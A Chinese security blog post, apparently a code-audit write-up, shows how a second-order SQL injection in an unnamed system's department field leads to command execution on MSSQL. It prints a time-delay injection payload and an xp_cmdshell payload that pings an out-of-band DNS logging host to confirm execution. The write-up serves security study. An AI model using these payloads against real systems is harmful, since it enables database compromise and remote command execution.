代码审计之XX系统二次注入到RCE

admin 2024年11月21日13:32:56评论7 views字数 393阅读1分18秒阅读模式

声明:本文仅用于网络安全相关知识分享,环境为本机靶场,请严格遵守网络安全相关法律法规。

未经授权利用本文相关技术从事违法活动的,一切后果由违法人自行承担!Jie安全公众号及作者不承担任何法律责任。

当某接口传参init为1时,会根据当前用户的uid(不可控)查询department并赋值给obj2

代码审计之XX系统二次注入到RCE

obj2直接拼进SQL语句中执行

代码审计之XX系统二次注入到RCE

找到个可以修改department的地方输入' WAITFOR DELAY '0:0:5'--

代码审计之XX系统二次注入到RCE

直接访问漏洞链接,用burp看有无延时

代码审计之XX系统二次注入到RCE

由于无回显,尝试打dnslog

burp开启dnslog

代码审计之XX系统二次注入到RCE

payload改为:

';exec master..xp_cmdshell 'ping u4zjw1z2qin2617mfv4uky3mgdm7aw.oastify.com'--

代码审计之XX系统二次注入到RCE

响应页面显示超时

代码审计之XX系统二次注入到RCE

但是dnslog打过来了

代码审计之XX系统二次注入到RCE

原文始发于微信公众号(Jie安全):代码审计之XX系统二次注入到RCE

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2024年11月21日13:32:56
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   代码审计之XX系统二次注入到RCEhttps://cn-sec.com/archives/3400132.html
                  免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉.

发表评论

匿名网友 填写信息